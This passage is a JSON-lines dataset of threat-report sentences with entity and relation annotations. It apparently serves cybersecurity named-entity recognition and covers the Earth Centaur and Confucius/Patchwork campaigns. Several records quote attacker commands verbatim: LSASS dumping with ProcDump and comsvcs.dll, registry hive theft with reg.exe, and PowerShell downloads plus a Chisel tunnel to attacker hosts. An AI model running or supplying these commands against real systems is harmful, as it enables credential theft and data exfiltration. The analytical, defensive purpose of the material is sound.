packet belongs to their backdoor and filter out the noise.","entities":[],"relations":[],"Comments":[]} {"id":4108,"text":" Figure 10.","entities":[],"relations":[],"Comments":[]} {"id":4109,"text":"Decrypted configuration file Without knowing the real traffic from the C&C server, we can only speculate on the content of the response based on the receiving function.","entities":[],"relations":[],"Comments":[]} {"id":4110,"text":"As shown in Figure 11, the content of the response should contain the sequence number used to verify if the received data comes from the correct source and two blocks of encrypted data.","entities":[],"relations":[],"Comments":[]} {"id":4111,"text":"The data decryption procedure is as follows: First, the encrypted data is decrypted with a one-byte XOR key (0xFF).","entities":[],"relations":[],"Comments":[]} {"id":4112,"text":"The first of the decrypted content contains a magic number used to check data in the second block, a command code, and the XOR key to decrypt the second set of encrypted content.","entities":[],"relations":[],"Comments":[]} {"id":4113,"text":"The second set of encrypted content is decrypted with an XOR key (0x99) from the previous decrypted content, and within the decrypted data are instructions for the following procedures.","entities":[],"relations":[],"Comments":[]} {"id":4114,"text":" Figure 11.","entities":[],"relations":[],"Comments":[]} {"id":4115,"text":"SmileSvr packet traffic format simulation ","entities":[],"relations":[],"Comments":[]} {"id":4116,"text":"While analyzing samples, we found that the C&C server was already inactive.","entities":[],"relations":[],"Comments":[]} {"id":4117,"text":"Without knowing the traffic between SmileSvr and C&C server, we could not fully understand all functions.","entities":[],"relations":[],"Comments":[]} {"id":4118,"text":"However, most of the backdoor functions are listed here: Command code Function 0x5001","entities":[],"relations":[],"Comments":[]} {"id":4119,"text":"Opens\/Reads specified file 0x5002 Unknown 0x5004 Opens\/Writes specified file 0x5006","entities":[],"relations":[],"Comments":[]} {"id":4120,"text":"Opens command shell 0x5007 Unknown 0x5009 Closes command shell 0x500A","entities":[],"relations":[],"Comments":[]} {"id":4121,"text":"File System Traversal 0x500C","entities":[],"relations":[],"Comments":[]} {"id":4122,"text":"Checks environment information 0x500E Unknown","entities":[],"relations":[],"Comments":[]} {"id":4123,"text":"As for the SSL version of SmileSvr, the capability of SSL communication is built by using wolfSSL, which is a lightweight, C-language based SSL\/TLS library.","entities":[],"relations":[],"Comments":[]} {"id":4124,"text":"The backdoor functions of SSL version SmileSvr are similar to the ICMP ones.","entities":[],"relations":[],"Comments":[]} {"id":4125,"text":"The threat actors just use it to develop new ways to support data transfer via an encrypted channel.","entities":[],"relations":[],"Comments":[]} {"id":4126,"text":"Customized Gh0st RAT","entities":[{"id":12418,"label":"malware","start_offset":11,"end_offset":20}],"relations":[],"Comments":[]} {"id":4127,"text":"In our investigation, we also found a suspicious executable named telegram.exe.","entities":[{"id":49926,"label":"FILEPATH","start_offset":66,"end_offset":78}],"relations":[],"Comments":[]} {"id":4128,"text":"After analyzing the file, we found that it was a customized version of Gh0st RAT.","entities":[{"id":49927,"label":"malware","start_offset":71,"end_offset":80}],"relations":[],"Comments":[]} {"id":4129,"text":"Compared to the original Gh0st RAT (Gh0st beta 3.6), the difference is that the customized version supports a new function to discover information from active sessions on the host.","entities":[{"id":49928,"label":"malware","start_offset":25,"end_offset":51}],"relations":[],"Comments":[]} {"id":4130,"text":"All supported functions for the customized Gh0st are shown in the following table: Command code Function 0xC8 Terminates connection 0xCA","entities":[{"id":49929,"label":"malware","start_offset":43,"end_offset":48}],"relations":[],"Comments":[]} {"id":4131,"text":"File manager to handle file operations 0xCB Screen monitoring 0xCC Opens remote shell for command execution 0XD5 Gets active session information Post","entities":[],"relations":[],"Comments":[]} {"id":4132,"text":"Exploitation","entities":[],"relations":[],"Comments":[]} {"id":4133,"text":"After successfully exploiting the vulnerable system, the threat actor will use multiple hacking tools to discover and compromise machines on the victim’s intranet.","entities":[],"relations":[],"Comments":[]} {"id":4134,"text":"In this stage, we also observed attempts to deploy tools to exfiltrate stolen information.","entities":[],"relations":[],"Comments":[]} {"id":4135,"text":"During our investigation, we found evidence of specific tools, which we listed in Table 1.","entities":[],"relations":[],"Comments":[]} {"id":4136,"text":"With these tools, the attackers accomplish their goals (network discovery, access to the intranet, and exfiltration) step by step.","entities":[],"relations":[],"Comments":[]} {"id":4137,"text":" Tool name Purpose Description SharpHound AD Discovery Discovery tool to understand the relationship in an AD environment FRPC Intranet Penetration Fast reverse proxy to help expose a local server behind a NAT or firewall to the internet Chisel Intranet Penetration Fast TCP\/UDP tunnel RClone Exfiltration A command-line program to sync files and directories to and from different cloud storage providers Credential Dumping","entities":[{"id":49930,"label":"attack-pattern","start_offset":406,"end_offset":424},{"id":49931,"label":"tools","start_offset":31,"end_offset":41},{"id":49932,"label":"malware","start_offset":238,"end_offset":244},{"id":49933,"label":"tools","start_offset":286,"end_offset":292}],"relations":[],"Comments":[]} {"id":4138,"text":"We also observed that the group used multiple legitimate tools to dump credentials on compromised machines.","entities":[],"relations":[],"Comments":[]} {"id":4139,"text":"It made good use of these tools to achieve its goal and keep its operation hidden and unobstructive.","entities":[],"relations":[],"Comments":[]} {"id":4140,"text":"For example, the group uses ProcDump.exe (a tool from Windows Sysinternals Suite that creates dumps of the processes in any scenario), which it renamed bootsys.exe: c:\\users\\public\\downloads\\bootsys.exe -accepteula -ma lsass.exe C:\\Users\\Public\\Downloads\\lsass.dmp","entities":[{"id":49934,"label":"FILEPATH","start_offset":28,"end_offset":40},{"id":49938,"label":"FILEPATH","start_offset":220,"end_offset":229},{"id":49936,"label":"FILEPATH","start_offset":165,"end_offset":202},{"id":49937,"label":"FILEPATH","start_offset":230,"end_offset":265},{"id":49935,"label":"FILEPATH","start_offset":152,"end_offset":163}],"relations":[],"Comments":[]} {"id":4141,"text":"The group dumps credentials stored in registries by using reg.exe: reg.exe save hklm\\sam C:\\Users\\Public\\Downloads\\sam.hive reg.exe save hklm\\sam c:\\windows\\temp\\sa.dit reg.exe save hklm\\security c:\\windows\\temp\\se.dit reg.exe save hklm\\system c:\\windows\\temp\\sy.dit","entities":[{"id":49940,"label":"FILEPATH","start_offset":146,"end_offset":168},{"id":49941,"label":"FILEPATH","start_offset":169,"end_offset":176},{"id":49944,"label":"FILEPATH","start_offset":219,"end_offset":226},{"id":49947,"label":"FILEPATH","start_offset":67,"end_offset":74},{"id":49939,"label":"REGISTRYKEY","start_offset":137,"end_offset":145},{"id":49942,"label":"REGISTRYKEY","start_offset":182,"end_offset":195},{"id":49943,"label":"FILEPATH","start_offset":196,"end_offset":218},{"id":49945,"label":"REGISTRYKEY","start_offset":232,"end_offset":243},{"id":49946,"label":"FILEPATH","start_offset":244,"end_offset":266},{"id":49948,"label":"REGISTRYKEY","start_offset":80,"end_offset":88},{"id":49949,"label":"FILEPATH","start_offset":89,"end_offset":123},{"id":49950,"label":"FILEPATH","start_offset":124,"end_offset":131}],"relations":[],"Comments":[]} {"id":4142,"text":"The group would also dump memory from the specified process by using comsvcs.dll: rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump 764 C:\\Windows\\TEMP\\dump.bin full Indicator Removal To avoid exposing their footprints to investigators, the threat actors made their own tool to wipe out the event logs on the victimized machine.","entities":[{"id":49954,"label":"tools","start_offset":127,"end_offset":135},{"id":49955,"label":"FILEPATH","start_offset":140,"end_offset":164},{"id":49951,"label":"FILEPATH","start_offset":69,"end_offset":80},{"id":49952,"label":"FILEPATH","start_offset":82,"end_offset":94},{"id":49953,"label":"FILEPATH","start_offset":95,"end_offset":126}],"relations":[],"Comments":[]} {"id":4143,"text":"By using this tool, they could clean specified event logs and make it hard for investigators to track their operations.","entities":[],"relations":[],"Comments":[]} {"id":4144,"text":"The usage is as follows: Intranet Penetration","entities":[],"relations":[],"Comments":[]} {"id":4145,"text":"After successfully exploiting the vulnerable system, threat actors also drop following tools: FRP and Chisel.","entities":[{"id":49957,"label":"tools","start_offset":102,"end_offset":108},{"id":49956,"label":"tools","start_offset":94,"end_offset":97}],"relations":[],"Comments":[]} {"id":4146,"text":"FRP is a fast reverse proxy used to expose a local server behind an NAT or a firewall to the internet.","entities":[{"id":49958,"label":"tools","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4147,"text":"It can read predefined configurations and make the host in the intranet available to users from the internet.","entities":[],"relations":[],"Comments":[]} {"id":4148,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":4149,"text":"Configuration for FRP fast reverse proxy Chisel is a fast TCP\/UDP tunnel, which is mainly used for passing through firewalls.","entities":[{"id":12469,"label":"malware","start_offset":18,"end_offset":21},{"id":12470,"label":"malware","start_offset":46,"end_offset":52}],"relations":[],"Comments":[]} {"id":4150,"text":"It provides the capability to transport data over HTTP (secured via Secure Shell, aka SSH) and allows threat actors to pass through a firewall and get access to the machine behind the firewall.","entities":[],"relations":[],"Comments":[]} {"id":4151,"text":"This is used to download reverse proxy Chisel via PowerShell: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -command \"$(new-object System.Net.WebClient).DownloadFile('https[:]\/\/webadmin[.]mirrorstorage[.]org\/ch.exe', 'ch.exe')\"","entities":[{"id":12475,"label":"malware","start_offset":39,"end_offset":45},{"id":12476,"label":"tools","start_offset":50,"end_offset":60},{"id":49959,"label":"FILEPATH","start_offset":62,"end_offset":119},{"id":49960,"label":"URL","start_offset":179,"end_offset":226},{"id":49961,"label":"FILEPATH","start_offset":230,"end_offset":236}],"relations":[],"Comments":[]} {"id":4152,"text":"This is used to build a connection between inter\/intranet via Chisel: C:\\WINDOWS\\system32\\ch.exe client https[:]\/\/webadmin[.]mirrorstorage[.]org:443 r:127.0.0.1:47586:socks Exfiltration","entities":[{"id":49964,"label":"URL","start_offset":105,"end_offset":149},{"id":49962,"label":"tools","start_offset":62,"end_offset":68},{"id":49963,"label":"FILEPATH","start_offset":71,"end_offset":97}],"relations":[],"Comments":[]} {"id":4153,"text":"In the previous phase, we observed that the actors use several tools to get the whole picture of the network infrastructure and bypass the firewall.","entities":[],"relations":[],"Comments":[]} {"id":4154,"text":"Afterward, we observed a PowerShell command used to download an effective tool, Rclone, which is used for exfiltration.","entities":[{"id":12482,"label":"tools","start_offset":25,"end_offset":35},{"id":12484,"label":"tools","start_offset":80,"end_offset":86}],"relations":[],"Comments":[]} {"id":4155,"text":"It also provides an easy and effective way of copying data to several cloud storage providers.","entities":[],"relations":[],"Comments":[]} {"id":4156,"text":"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command \"$(new-object System.Net.WebClient).DownloadFile('http:\/\/195[.]123[.]221[.]7:8080\/rclone.exe', 'r.exe')","entities":[{"id":49965,"label":"FILEPATH","start_offset":0,"end_offset":57},{"id":49966,"label":"URL","start_offset":117,"end_offset":159}],"relations":[],"Comments":[]} {"id":4157,"text":" Based on previous experience, Rclone has frequently been used in ransomware attacks to exfiltrate stolen data.","entities":[{"id":12490,"label":"tools","start_offset":31,"end_offset":37}],"relations":[],"Comments":[]} {"id":4158,"text":"However, it seems that currently, it is not only used in ransomware attacks but also in APT attacks.","entities":[],"relations":[],"Comments":[]} {"id":4159,"text":"Identifying Features in the Earth Centaur Campaign","entities":[{"id":49967,"label":"campaign","start_offset":28,"end_offset":50}],"relations":[],"Comments":[]} {"id":4160,"text":"After long-term observation and analysis of the attack campaigns, there was compelling evidence that they were operated by Earth Centaur.","entities":[{"id":49968,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} {"id":4161,"text":"We found several identifying features of the threat actors within the techniques and tools described in the preceding sections, and we break down the factors in the following.","entities":[],"relations":[],"Comments":[]} {"id":4162,"text":"Mutex Style","entities":[],"relations":[],"Comments":[]} {"id":4163,"text":"We found some special mutexes that are encoded by the layout of the Chinese Zhuyin keyboard in ChiserClient.","entities":[{"id":49969,"label":"malware","start_offset":95,"end_offset":107}],"relations":[],"Comments":[]} {"id":4164,"text":"The decoded string is shown in Table 2.","entities":[],"relations":[],"Comments":[]} {"id":4165,"text":"Based on these special mutex strings, we believe the threat actors come from a Chinese-speaking region.","entities":[{"id":49970,"label":"threat-actor","start_offset":53,"end_offset":66},{"id":49971,"label":"location","start_offset":79,"end_offset":102}],"relations":[{"id":894,"from_id":49970,"to_id":49971,"type":"located-at"}],"Comments":[]} {"id":4166,"text":"Table 2. Encoded\/Decoded mutex string Encoded string Decoded string in Chinese English translation vul3ru,6q8 q8 y.3 小傑趴趴走 Jack goes around ji394su3 我愛你 I love you 5ji fu.6cl3g.3zj6m0694 桌球好手福原愛 Excellent table tennis player, Ai Fukuhara Configuration style ","entities":[],"relations":[],"Comments":[]} {"id":4167,"text":"After analyzing the ChiserClient, we found that it shares a similar style of network configuration to the TClient mentioned in our previous research on Earth Centaur.","entities":[{"id":12514,"label":"malware","start_offset":20,"end_offset":32},{"id":12515,"label":"malware","start_offset":106,"end_offset":113},{"id":49972,"label":"threat-actor","start_offset":152,"end_offset":166}],"relations":[{"id":895,"from_id":12515,"to_id":49972,"type":"authored-by"},{"id":896,"from_id":12514,"to_id":49972,"type":"authored-by"}],"Comments":[]} {"id":4168,"text":" Figure 13. Network configuration (Left: ChiserClient","entities":[{"id":12518,"label":"malware","start_offset":45,"end_offset":57}],"relations":[],"Comments":[]} {"id":4169,"text":"Right: TClient)","entities":[{"id":12519,"label":"malware","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} {"id":4170,"text":" Code Similarity","entities":[],"relations":[],"Comments":[]} {"id":4171,"text":"After checking the backdoor SmileSvr, we found that there was a code similarity between it and Troj_YAHAMAM, which was used by Earth Centaur in an earlier operation.","entities":[{"id":49973,"label":"malware","start_offset":95,"end_offset":107},{"id":49974,"label":"threat-actor","start_offset":127,"end_offset":140}],"relations":[{"id":897,"from_id":49974,"to_id":49973,"type":"uses"}],"Comments":[]} {"id":4172,"text":"Both share similar codes in configuration decoding, which is shown in Figure 14.","entities":[],"relations":[],"Comments":[]} {"id":4173,"text":"Furthermore, the delimiter that was used in SmileSvr to split different values in configuration files is the same as the one used in YAHAMAM (shown as Figure 15). Figure 14.","entities":[{"id":49976,"label":"malware","start_offset":44,"end_offset":52},{"id":49975,"label":"malware","start_offset":133,"end_offset":140}],"relations":[],"Comments":[]} {"id":4174,"text":"Configuration decoding function (left: SmileSvr right: Troj_Yahamam) Figure 15. Function used to split different values in configuration file (left: SmileSvr right: Troj_Yahamam)","entities":[{"id":49978,"label":"malware","start_offset":170,"end_offset":182},{"id":49979,"label":"malware","start_offset":154,"end_offset":162},{"id":49980,"label":"malware","start_offset":39,"end_offset":47},{"id":49977,"label":"malware","start_offset":55,"end_offset":67}],"relations":[],"Comments":[]} {"id":4175,"text":" Conclusion","entities":[],"relations":[],"Comments":[]} {"id":4176,"text":"These threat actors are notably sophisticated and well-equipped.","entities":[],"relations":[],"Comments":[]} {"id":4177,"text":"Looking deeper into the new methods the group uses, we found that it has an arsenal of tools capable of assessing and then compromising its targets while remaining under the radar.","entities":[],"relations":[],"Comments":[]} {"id":4178,"text":"For example, the group can map their target’s network infrastructure and bypass firewalls.","entities":[{"id":49981,"label":"attack-pattern","start_offset":73,"end_offset":89},{"id":49982,"label":"attack-pattern","start_offset":27,"end_offset":68}],"relations":[],"Comments":[]} {"id":4179,"text":"It uses backdoors with different protocols, which are deployed depending on the victim.","entities":[{"id":49983,"label":"attack-pattern","start_offset":8,"end_offset":42}],"relations":[],"Comments":[]} {"id":4180,"text":"It also has the capability to develop customized tools to evade security monitoring in different environments, and it exploits vulnerable websites and uses them as C&C servers. In this blog, we outlined our new findings related to these threat actors to help possible targets in the transportation and other industries.","entities":[],"relations":[],"Comments":[]} {"id":4181,"text":"Information on how a threat enters and operates within a victim’s network is invaluable to security teams and can help them create more effective protection for vulnerable organizations.","entities":[],"relations":[],"Comments":[]} {"id":4182,"text":"Organizations can also find capable security solutions that can help interpret and respond to malicious activities, techniques, and movements before the threat can culminate and affect an enterprise.","entities":[],"relations":[],"Comments":[]} {"id":4183,"text":"Trend Micro Vision One™️ with Managed XDR gives security teams a consolidated view into valuable insights so they can organize a more solid line of defense ahead of attacks.","entities":[{"id":49984,"label":"SOFTWARE","start_offset":0,"end_offset":24}],"relations":[],"Comments":[]} {"id":4184,"text":"For a list of the Indicators of Compromise, please see this document.","entities":[],"relations":[],"Comments":[]} {"id":4185,"text":" MITRE ATT&CK Matrix Tactics ID Technique Initial access T1190","entities":[{"id":49985,"label":"identity","start_offset":2,"end_offset":8},{"id":49986,"label":"attack-pattern","start_offset":44,"end_offset":64}],"relations":[],"Comments":[]} {"id":4186,"text":"Exploit public-facing application Execution T1059.001","entities":[{"id":49987,"label":"attack-pattern","start_offset":0,"end_offset":53}],"relations":[],"Comments":[]} {"id":4187,"text":"Command and Scripting Interpreter: PowerShell T1059.003 Command and scripting interpreter: Windows Command Shell T1569.002","entities":[{"id":49988,"label":"tools","start_offset":35,"end_offset":45},{"id":49989,"label":"tools","start_offset":91,"end_offset":112}],"relations":[],"Comments":[]} {"id":4188,"text":"System Services: Service Execution Persistence T1543.003","entities":[{"id":49990,"label":"attack-pattern","start_offset":17,"end_offset":56}],"relations":[],"Comments":[]} {"id":4189,"text":"Create or Modify System Process: Windows Service T1574.002","entities":[{"id":49991,"label":"attack-pattern","start_offset":0,"end_offset":58}],"relations":[],"Comments":[]} {"id":4190,"text":"Hijack Execution Flow: DLL Side-Loading T1505.003 Server Software Component: Web Shell Defense evasion T1140","entities":[{"id":49992,"label":"attack-pattern","start_offset":0,"end_offset":49},{"id":49993,"label":"attack-pattern","start_offset":50,"end_offset":108}],"relations":[],"Comments":[]} {"id":4191,"text":"Deobfuscate\/Decode Files or Information","entities":[{"id":49994,"label":"attack-pattern","start_offset":0,"end_offset":39}],"relations":[],"Comments":[]} {"id":4192,"text":"T1480 Execution Guardrails T1574.002","entities":[{"id":49995,"label":"attack-pattern","start_offset":6,"end_offset":36}],"relations":[],"Comments":[]} {"id":4193,"text":"Hijack Execution Flow: DLL Side-Loading T1070.001 Indicator Removal on Host: Clear Windows Event Logs T1027.002","entities":[{"id":49996,"label":"attack-pattern","start_offset":23,"end_offset":49},{"id":49997,"label":"attack-pattern","start_offset":77,"end_offset":111}],"relations":[],"Comments":[]} {"id":4194,"text":"Obfuscated Files or Information: Software Packing T1218.011","entities":[{"id":49998,"label":"attack-pattern","start_offset":0,"end_offset":59}],"relations":[],"Comments":[]} {"id":4195,"text":"Signed Binary Proxy Execution: Rundll32 T1036.005","entities":[{"id":49999,"label":"attack-pattern","start_offset":0,"end_offset":49}],"relations":[],"Comments":[]} {"id":4196,"text":"Masquerading: Match Legitimate Name or Location T1197 BITS Jobs T1070.006","entities":[{"id":50000,"label":"attack-pattern","start_offset":14,"end_offset":73}],"relations":[],"Comments":[]} {"id":4197,"text":"Indicator Removal on Host: Timestomp Credential Access T1003.001 OS Credential Dumping: LSASS Memory T1552.002","entities":[{"id":50001,"label":"attack-pattern","start_offset":27,"end_offset":64},{"id":50002,"label":"attack-pattern","start_offset":65,"end_offset":110}],"relations":[],"Comments":[]} {"id":4198,"text":"OS Credential Dumping: Credentials in Registry Lateral Movement T1021.002","entities":[{"id":50004,"label":"attack-pattern","start_offset":0,"end_offset":73}],"relations":[],"Comments":[]} {"id":4199,"text":"Remote Services: SMB\/Windows Admin Shares Discovery T1087.002","entities":[{"id":50005,"label":"attack-pattern","start_offset":17,"end_offset":61}],"relations":[],"Comments":[]} {"id":4200,"text":"Account Discovery: Domain Account T1482 Domain Trust Discovery T1083 File and Directory Discovery Collection T1005 Data from Local System Command and control T1071.001","entities":[{"id":50008,"label":"attack-pattern","start_offset":69,"end_offset":114},{"id":50006,"label":"attack-pattern","start_offset":0,"end_offset":39},{"id":50007,"label":"attack-pattern","start_offset":40,"end_offset":68},{"id":50009,"label":"attack-pattern","start_offset":115,"end_offset":168}],"relations":[],"Comments":[]} {"id":4201,"text":"Application layer protocol: web protocols T1095 Non-Application layer protocol T1090.001 Proxy: Internal Proxy Exfiltration T1567.002","entities":[{"id":50010,"label":"attack-pattern","start_offset":0,"end_offset":47},{"id":50011,"label":"attack-pattern","start_offset":48,"end_offset":88},{"id":50012,"label":"attack-pattern","start_offset":89,"end_offset":133}],"relations":[],"Comments":[]} {"id":4202,"text":"Exfiltration to Cloud Storage Tags APT & Targeted Attacks | Endpoints | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":4203,"text":"Updated the appendix on August 30, 2018 to fix formatting and add new information.","entities":[{"id":50013,"label":"TIME","start_offset":24,"end_offset":39}],"relations":[],"Comments":[]} {"id":4204,"text":"Back in February, we noted the similarities between the Patchwork and Confucius groups and found that, in addition to the similarities in their malware code, both groups primarily went after targets in South Asia.","entities":[{"id":50016,"label":"threat-actor","start_offset":70,"end_offset":79},{"id":50014,"label":"TIME","start_offset":8,"end_offset":16},{"id":50015,"label":"threat-actor","start_offset":56,"end_offset":65},{"id":50017,"label":"location","start_offset":202,"end_offset":212}],"relations":[{"id":898,"from_id":50015,"to_id":50016,"type":"related-to"},{"id":899,"from_id":50015,"to_id":50017,"type":"targets"},{"id":900,"from_id":50016,"to_id":50017,"type":"targets"},{"id":901,"from_id":50016,"to_id":50015,"type":"related-to"}],"Comments":[]} {"id":4205,"text":"During the months that followed in which we tracked Confucius’ activities, we found that they were still aiming for Pakistani targets.","entities":[{"id":50019,"label":"location","start_offset":116,"end_offset":125},{"id":50018,"label":"threat-actor","start_offset":52,"end_offset":61}],"relations":[{"id":902,"from_id":50018,"to_id":50019,"type":"targets"}],"Comments":[]} {"id":4206,"text":"During their previous campaign, we found Confucius using fake romance websites to entice victims into installing malicious Android applications.","entities":[{"id":50020,"label":"threat-actor","start_offset":41,"end_offset":50},{"id":50021,"label":"SOFTWARE","start_offset":123,"end_offset":130}],"relations":[],"Comments":[]} {"id":4207,"text":"This time, the threat actor seems to have a new modus operandi, setting up two new websites and new payloads with which to compromise its targets.","entities":[],"relations":[],"Comments":[]} {"id":4208,"text":"Fake Android porn app and Windows chat applications as lures","entities":[],"relations":[],"Comments":[]} {"id":4209,"text":"The first website uses adult content as a lure, via an Android application called Fuddi Duniya, which links to a website that displays nude pictures every day.","entities":[{"id":50022,"label":"SOFTWARE","start_offset":55,"end_offset":63},{"id":50023,"label":"malware","start_offset":82,"end_offset":94}],"relations":[],"Comments":[]} {"id":4210,"text":"The app’s APK is linked directly from the homepage, with a disclaimer stating that Google Play does not allow pornography in their store.","entities":[{"id":50024,"label":"SOFTWARE","start_offset":83,"end_offset":94}],"relations":[],"Comments":[]} {"id":4211,"text":" Figure 1: fake website with a link to download the Fuddi Duniya app.","entities":[{"id":50025,"label":"malware","start_offset":52,"end_offset":64}],"relations":[],"Comments":[]} {"id":4212,"text":"The displayed Urdu text could be translated as “Real women, girls, and housewives || Download the app now More than thousands of women app.”","entities":[],"relations":[],"Comments":[]} {"id":4213,"text":"The app’s features are similar to the previous malicious Android application, such as having the ability to record audio and steal SMS, accounts, contacts and certain file types from specific directories.","entities":[{"id":50026,"label":"SOFTWARE","start_offset":57,"end_offset":64},{"id":50028,"label":"attack-pattern","start_offset":125,"end_offset":177},{"id":50027,"label":"attack-pattern","start_offset":108,"end_offset":120}],"relations":[],"Comments":[]} {"id":4214,"text":"In addition, the application now retrieves the last known location and uses the development platform Google Firebase to upload the stolen content.","entities":[{"id":50029,"label":"SOFTWARE","start_offset":101,"end_offset":116}],"relations":[],"Comments":[]} {"id":4215,"text":" Figure 2: Stealing function excerpt from Fuddi Duniya Android app","entities":[{"id":50030,"label":"malware","start_offset":42,"end_offset":66}],"relations":[],"Comments":[]} {"id":4216,"text":"The second fake website is again related to chat, with a background suggesting that it can help find users a partner.","entities":[],"relations":[],"Comments":[]} {"id":4217,"text":"Initially, a link to a malicious Android application hosted on Google Play that shared the same features as the application described above was present.","entities":[{"id":50031,"label":"SOFTWARE","start_offset":63,"end_offset":74},{"id":50032,"label":"SOFTWARE","start_offset":33,"end_offset":40}],"relations":[],"Comments":[]} {"id":4218,"text":"But after we reached out to Google while carrying out the research, the application was removed from the store and the link was removed from the fake website.","entities":[{"id":50033,"label":"identity","start_offset":28,"end_offset":34}],"relations":[],"Comments":[]} {"id":4219,"text":" Figure 3. Screenshot of the second fake website","entities":[],"relations":[],"Comments":[]} {"id":4220,"text":"Same as with the fake Tweety chat application we described in detail in our previous research, a Windows application with real chat features based on the open-source chat application RocketChat was offered.","entities":[{"id":50034,"label":"malware","start_offset":17,"end_offset":45}],"relations":[],"Comments":[]} {"id":4221,"text":"Similarly, this application also comes bundled with malicious .NET code.","entities":[],"relations":[],"Comments":[]} {"id":4222,"text":"While small and relatively simple, we found this malicious application interesting to analyze as it revealed the countries targeted by the threat actor.","entities":[],"relations":[],"Comments":[]} {"id":4223,"text":"The application is a simple downloader that sends some basic information (username, antivirus, IP address, and operating system version) encrypted using triple Data Encryption Standard (DES). Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":4224,"text":"Sample of the app’s code Periodically, the malware tries to contact the Command-and-Control (C&C) server with the username encoded into parameters.","entities":[],"relations":[],"Comments":[]} {"id":4225,"text":"Based on the information they retrieve, the operators can then decide to instruct the malware to download the second stage payload.","entities":[],"relations":[],"Comments":[]} {"id":4226,"text":"This function is similar to the various versions of backdoors (such as sctrls and sip_telephone) that we analyzed in our previous blog post and whitepaper.","entities":[],"relations":[],"Comments":[]} {"id":4227,"text":"An interesting feature of the downloader: It uses an online service to retrieve the victim's IP address and country, which it compares with a list of allowed countries.","entities":[],"relations":[],"Comments":[]} {"id":4228,"text":"If the victim seemingly comes from a different country, the program will self-delete and quit.","entities":[],"relations":[],"Comments":[]} {"id":4231,"text":"Excerpt of the valid country list We noted that it does both client-side and server-side IP filtering, showing that the attacker has improved its infrastructure.","entities":[],"relations":[],"Comments":[]} {"id":4232,"text":"At the end of last year, a C&C from the same threat actor was not only accessible from any IP address, but it was possible to browse the server directory tree without authentication.","entities":[],"relations":[],"Comments":[]} {"id":4233,"text":"After impersonating a fake victim of interest, we obtained a second stage payload (Detected as TROJ_DELF.XXWZ), which is a filestealer based on the Delphi programming language similar to the “svctrls” malware described in our previous blogpost.","entities":[{"id":50043,"label":"malware","start_offset":95,"end_offset":109}],"relations":[],"Comments":[]} {"id":4234,"text":"This one is called “sysctrls” and it looks for files with the following extensions: ","entities":[],"relations":[],"Comments":[]} {"id":4235,"text":"Extension File Type .doc, docx Microsoft Word document .xls,.xlsx","entities":[],"relations":[],"Comments":[]} {"id":4236,"text":"Microsoft Excel document .ppt, .pptx Microsoft Powerpoint presentation .pptx","entities":[],"relations":[],"Comments":[]} {"id":4237,"text":"Microsoft Powerpoint presentation .png, .jpg, .jpeg Image file .pst, .ost Microsoft Outlook file .csv","entities":[],"relations":[],"Comments":[]} {"id":4238,"text":"Spreadsheet file ","entities":[],"relations":[],"Comments":[]} {"id":4239,"text":"It then sends them via a POST HTTP request to windefendr[.]com\/description.php.","entities":[{"id":50044,"label":"URL","start_offset":46,"end_offset":78}],"relations":[],"Comments":[]} {"id":4240,"text":"Further analysis of this filestealer revealed interesting links with other threat actor groups.","entities":[],"relations":[],"Comments":[]} {"id":4241,"text":"The Delphi Link","entities":[],"relations":[],"Comments":[]} {"id":4242,"text":"We already mentioned that Confucius had possible links to other groups in our previous blog post, which mentioned code sharing between Patchwork and Confucius.","entities":[{"id":50045,"label":"threat-actor","start_offset":26,"end_offset":35},{"id":50046,"label":"threat-actor","start_offset":135,"end_offset":144},{"id":50047,"label":"threat-actor","start_offset":149,"end_offset":158}],"relations":[{"id":903,"from_id":50046,"to_id":50047,"type":"related-to"}],"Comments":[]} {"id":4243,"text":"Both groups used a backdoor with the same configuration file structure and commands.","entities":[],"relations":[],"Comments":[]} {"id":4244,"text":"We found more code shared among the two threat actor’s malware, as Patchwork recently used multiple Delphi malware similar to some of the Delphi malware we described before.","entities":[{"id":50049,"label":"malware","start_offset":138,"end_offset":152},{"id":50050,"label":"malware","start_offset":100,"end_offset":114},{"id":50048,"label":"threat-actor","start_offset":67,"end_offset":76}],"relations":[{"id":904,"from_id":50048,"to_id":50050,"type":"uses"},{"id":905,"from_id":50049,"to_id":50050,"type":"duplicate-of"}],"Comments":[]} {"id":4245,"text":"We initially spotted some visual similarities between the malware used.","entities":[],"relations":[],"Comments":[]} {"id":4246,"text":"Although no forms are displayed while the malware is running, we can see its TForm object in the Delphi decompiler.","entities":[],"relations":[],"Comments":[]} {"id":4247,"text":"The TForm object often has two TTimer objects — but sometimes we have seen one or even three of these objects — usually with random names.","entities":[],"relations":[],"Comments":[]} {"id":4248,"text":"Occasionally, listboxes with encrypted strings are also added.","entities":[],"relations":[],"Comments":[]} {"id":4249,"text":"Figure 6: Decompiled Form structure of Confucius’ sample (d971842441c83c1bba05742d124620f5741bb5d5da9ffb31f06efa4bbdcf04ee, Detected as TSPY_CONFSTEAL.A) Figure 7:","entities":[{"id":50051,"label":"SHA2","start_offset":58,"end_offset":122},{"id":50052,"label":"malware","start_offset":136,"end_offset":152}],"relations":[{"id":906,"from_id":50051,"to_id":50052,"type":"indicates"}],"Comments":[]} {"id":4250,"text":"Decompiled Form structure of Patchwork’s sample (795ae4097aa3bd5932be4110f6bd992f46d605d4c9e3afced314454d35395a59, Detected as TROJ_DELF.XXWZ)","entities":[{"id":12743,"label":"threat-actor","start_offset":29,"end_offset":38},{"id":12745,"label":"SHA2","start_offset":49,"end_offset":113},{"id":50053,"label":"malware","start_offset":127,"end_offset":141}],"relations":[{"id":907,"from_id":12745,"to_id":50053,"type":"indicates"},{"id":908,"from_id":12743,"to_id":50053,"type":"uses"}],"Comments":[]} {"id":4251,"text":"While looking into any of the TTimers’ OnTimer methods, we often found a certain kind of structure: A pointer to an encrypted string stored in an EDX register followed by the call to the decryption function.","entities":[],"relations":[],"Comments":[]} {"id":4252,"text":" Figure 8: Calling the decryption function This encouraged us to analyze the string encryption routines thoroughly.","entities":[],"relations":[],"Comments":[]} {"id":4253,"text":"Our analysis revealed three of them.","entities":[],"relations":[],"Comments":[]} 